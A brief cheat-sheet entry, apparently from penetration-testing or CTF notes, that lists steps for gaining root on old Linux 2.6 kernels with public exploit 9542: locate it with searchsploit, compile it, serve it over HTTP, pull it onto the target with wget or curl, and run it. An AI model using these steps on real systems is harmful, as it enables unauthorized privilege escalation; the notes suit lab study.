Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5...)

[1]searchsploit 9542

[2]copy exploit to /var/www/html

[3]compile with

sudo gcc -m32 -Wl,--hash-style=both 9542.c -o exploit

[4]serve on port 80 with python

[5]Transfer the exploit with wget or curl

[6]chmod 777 exploit

[7]./exploit โ†’ #root

Last updated